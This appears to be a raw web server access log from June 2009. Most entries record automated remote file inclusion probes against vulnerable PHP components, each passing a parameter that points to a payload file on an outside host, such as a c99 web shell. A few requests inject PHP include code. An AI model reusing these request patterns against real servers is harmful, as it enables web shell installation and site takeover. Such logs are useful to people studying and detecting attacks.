151.1.154.24 - - [22/Jun/2009:00:29:01 -0400] "GET /logs/access_log.Q109052800/index.phpmain.php?x=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
74.6.17.151 - - [22/Jun/2009:00:28:52 -0400] "GET /logs/access_log.Q109061300 HTTP/1.0" 200 2008810 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [22/Jun/2009:00:29:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.162.115.67 - - [22/Jun/2009:00:29:34 -0400] "GET /logs/access_log.Q109061800/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
66.221.37.118 - - [22/Jun/2009:00:31:03 -0400] "GET /logs/access_log.Q109051500//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.0" 404 239 "-" "Mozilla/5.0"
66.221.37.118 - - [22/Jun/2009:00:31:03 -0400] "GET /logs/access_log.Q109060600//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.0" 404 239 "-" "Mozilla/5.0"
66.221.37.118 - - [22/Jun/2009:00:31:03 -0400] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.0" 404 217 "-" "Mozilla/5.0"
66.221.37.118 - - [22/Jun/2009:00:31:03 -0400] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.0" 404 212 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:00:31:19 -0400] "GET /logs/access_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
66.249.71.14 - - [22/Jun/2009:00:31:21 -0400] "GET /images/index_prp_over.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
151.1.154.24 - - [22/Jun/2009:00:31:55 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:31:56 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:32:18 -0400] "GET /logs/access_log.Q109052800%20%20/index.phpmain.php?x=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:00:32:25 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:00:32:25 -0400] "GET /logs/access_log.Q109061800%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:00:32:25 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
98.168.207.219 - - [22/Jun/2009:00:33:02 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
98.168.207.219 - - [22/Jun/2009:00:33:02 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
98.168.207.219 - - [22/Jun/2009:00:33:04 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
98.168.207.219 - - [22/Jun/2009:00:33:04 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
89.188.104.5 - - [22/Jun/2009:00:33:23 -0400] "GET /logs/access_log.Q109052500//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.eyepro.net//assets/images/tanii?????????????? HTTP/1.1" 404 287 "-" "libwww-perl/5.812"
89.188.104.5 - - [22/Jun/2009:00:33:24 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.eyepro.net//assets/images/tanii?????????????? HTTP/1.1" 404 260 "-" "libwww-perl/5.812"
89.188.104.5 - - [22/Jun/2009:00:33:24 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.eyepro.net//assets/images/tanii?????????????? HTTP/1.1" 404 265 "-" "libwww-perl/5.812"
216.139.67.116 - - [22/Jun/2009:00:33:38 -0400] "GET /logs/access_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
66.221.37.118 - - [22/Jun/2009:00:33:43 -0400] "GET /logs/access_log.Q109051500//&highlight='.include($_GET[a]),exit.'&a=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.0" 404 338 "-" "Mozilla/5.0"
66.221.37.118 - - [22/Jun/2009:00:33:43 -0400] "GET /logs//&highlight='.include($_GET[a]),exit.'&a=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.0" 404 316 "-" "Mozilla/5.0"
66.221.37.118 - - [22/Jun/2009:00:33:43 -0400] "GET /logs/access_log.Q109060600//&highlight='.include($_GET[a]),exit.'&a=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.0" 404 338 "-" "Mozilla/5.0"
66.221.37.118 - - [22/Jun/2009:00:33:44 -0400] "GET //&highlight='.include($_GET[a]),exit.'&a=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.0" 404 311 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:00:34:17 -0400] "GET /logs/access_log.Q109061800/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:00:34:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
151.1.154.24 - - [22/Jun/2009:00:34:35 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:34:35 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:34:35 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
219.94.194.231 - - [22/Jun/2009:00:35:18 -0400] "GET /logs/access_log.Q109061800/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
219.94.194.231 - - [22/Jun/2009:00:35:18 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
219.94.194.231 - - [22/Jun/2009:00:35:19 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
222.162.115.67 - - [22/Jun/2009:00:36:36 -0400] "GET /logs/access_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:00:37:46 -0400] "GET //modules/My_eGallery/public/displayCategory.php?adminpath=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:00:37:46 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:00:37:46 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:00:37:51 -0400] "GET /logs/access_log.Q109052100//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:00:38:18 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:00:38:18 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:00:38:19 -0400] "GET /logs/access_log.Q109061800%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
87.118.90.151 - - [22/Jun/2009:00:39:04 -0400] "GET /logs/access_log.Q109052000/errors.php?error=http://a2222.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
87.118.90.151 - - [22/Jun/2009:00:39:04 -0400] "GET /errors.php?error=http://a2222.altervista.org/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
87.118.90.151 - - [22/Jun/2009:00:39:04 -0400] "GET /logs/errors.php?error=http://a2222.altervista.org/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
74.53.70.114 - - [22/Jun/2009:00:39:19 -0400] "GET /logs/access_log.Q109051100%20%20//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:00:39:19 -0400] "GET /logs/access_log.Q109052100%20%20//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
66.249.71.54 - - [22/Jun/2009:00:39:29 -0400] "GET /images/over-index3.roundburs.jpg HTTP/1.1" 200 2335 "-" "Googlebot-Image/1.0"
121.130.29.11 - - [22/Jun/2009:00:39:46 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
121.130.29.11 - - [22/Jun/2009:00:39:47 -0400] "GET //include/mail.inc.php?skin_board_path=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
121.130.29.11 - - [22/Jun/2009:00:39:56 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:00:39:58 -0400] "GET /logs/error_log.Q109061500%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
121.130.29.11 - - [22/Jun/2009:00:40:00 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
87.118.90.151 - - [22/Jun/2009:00:40:14 -0400] "GET /errors.php?error=http://a2222.altervista.org/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
208.111.94.201 - - [22/Jun/2009:00:40:20 -0400] "GET //modules//xoopsgallery/gallery_remote.php?GALLERY_BASEDIR=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:00:40:21 -0400] "GET /logs//modules//xoopsgallery/gallery_remote.php?GALLERY_BASEDIR=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:00:40:21 -0400] "GET /logs/access_log.Q109051500//modules//xoopsgallery/gallery_remote.php?GALLERY_BASEDIR=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:00:40:27 -0400] "GET /logs/access_log.Q109051600//modules//xoopsgallery/gallery_remote.php?GALLERY_BASEDIR=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:00:40:44 -0400] "GET /logs/access_log.Q109061800/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
87.118.90.151 - - [22/Jun/2009:00:40:55 -0400] "GET /errors.php?error=http://a2222.altervista.org/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
222.162.115.67 - - [22/Jun/2009:00:40:55 -0400] "GET /logs/access_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
89.188.104.5 - - [22/Jun/2009:00:40:57 -0400] "GET /logs/access_log.Q109052000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.eyepro.net//assets/images/tanii?????????????? HTTP/1.1" 404 287 "-" "libwww-perl/5.812"
87.118.90.151 - - [22/Jun/2009:00:41:10 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://a2222.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
208.111.94.201 - - [22/Jun/2009:00:41:22 -0400] "GET /logs/error_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:43:01 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:43:02 -0400] "GET /logs/access_log.Q109052400%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:00:43:08 -0400] "GET /logs/access_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
219.94.194.231 - - [22/Jun/2009:00:43:16 -0400] "GET /logs/error_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
87.118.90.151 - - [22/Jun/2009:00:43:16 -0400] "GET /logs/access_log.Q109052400/errors.php?error=http://a2222.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
87.118.90.151 - - [22/Jun/2009:00:43:16 -0400] "GET /errors.php?error=http://a2222.altervista.org/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
87.118.90.151 - - [22/Jun/2009:00:43:16 -0400] "GET /logs/errors.php?error=http://a2222.altervista.org/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
87.118.90.151 - - [22/Jun/2009:00:43:59 -0400] "GET /logs/error_log.Q109052400/errors.php?error=http://a2222.altervista.org/id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
208.111.94.201 - - [22/Jun/2009:00:44:02 -0400] "GET /logs/access_log.Q109051500%20%20//modules//xoopsgallery/gallery_remote.php?GALLERY_BASEDIR=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:00:44:05 -0400] "GET /logs/access_log.Q109051600%20%20//modules//xoopsgallery/gallery_remote.php?GALLERY_BASEDIR=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:00:44:09 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:00:44:09 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:00:44:09 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:00:44:12 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:00:44:12 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:00:44:12 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:00:44:21 -0400] "GET /logs/error_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:00:44:22 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:00:44:24 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:00:44:24 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:00:44:24 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:00:44:29 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:00:44:29 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:00:44:29 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:00:44:33 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:00:44:33 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:00:44:33 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:00:44:38 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:00:44:40 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:00:44:40 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:00:44:40 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:00:44:40 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:00:44:46 -0400] "GET /send_reminders.php?includedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:00:44:46 -0400] "GET /logs/access_log.Q109060600/send_reminders.php?includedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:00:44:46 -0400] "GET /logs/send_reminders.php?includedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:00:44:52 -0400] "GET /logs/error_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:00:44:55 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:00:45:01 -0400] "GET /logs/send_reminders.php?includedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:00:45:01 -0400] "GET /send_reminders.php?includedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:00:45:01 -0400] "GET /logs/access_log.Q109060600/send_reminders.php?includedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:00:45:07 -0400] "GET /send_reminders.php?includedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:00:45:07 -0400] "GET /logs/send_reminders.php?includedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:00:45:07 -0400] "GET /logs/access_log.Q109060600/send_reminders.php?includedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.188.236.212 - - [22/Jun/2009:00:45:16 -0400] "GET /index.php?arquivo=http://webmail.mst.org.br/bin/c99.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
121.130.29.11 - - [22/Jun/2009:00:45:50 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
121.130.29.11 - - [22/Jun/2009:00:45:54 -0400] "GET /logs/error_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://prideknives.co.nz/var/1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
121.165.73.157 - - [22/Jun/2009:00:46:01 -0400] "GET /logs/error_log.Q109050700/index.php?meio.php=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
121.165.73.157 - - [22/Jun/2009:00:46:01 -0400] "GET /index.php?meio.php=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
121.165.73.157 - - [22/Jun/2009:00:46:01 -0400] "GET /logs/index.php?meio.php=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
121.165.73.157 - - [22/Jun/2009:00:46:01 -0400] "GET /logs/access_log.Q109050700/index.php?meio.php=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
151.1.154.24 - - [22/Jun/2009:00:46:28 -0400] "GET /logs/access_log.Q109060400/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:46:31 -0400] "GET /logs/index.phpmain.php?x=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:46:31 -0400] "GET /index.phpmain.php?x=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:46:52 -0400] "GET /logs/access_log.Q109052800%20%20/index.phpmain.php?x=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:00:47:43 -0400] "GET /logs/access_log.Q109060600%20%20/send_reminders.php?includedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:47:50 -0400] "GET /logs/access_log.Q109052800/index.phpmain.php?x=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:00:48:16 -0400] "GET /logs/access_log.Q109060600%20%20/send_reminders.php?includedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:00:48:17 -0400] "GET /logs/access_log.Q109060600%20%20/send_reminders.php?includedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
208.38.188.128 - - [22/Jun/2009:00:49:10 -0400] "GET /logs//modules//xoopsgallery/gallery_remote.php?GALLERY_BASEDIR=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
208.38.188.128 - - [22/Jun/2009:00:49:10 -0400] "GET //modules//xoopsgallery/gallery_remote.php?GALLERY_BASEDIR=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
208.38.188.128 - - [22/Jun/2009:00:49:10 -0400] "GET /logs/access_log.Q109051500//modules//xoopsgallery/gallery_remote.php?GALLERY_BASEDIR=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
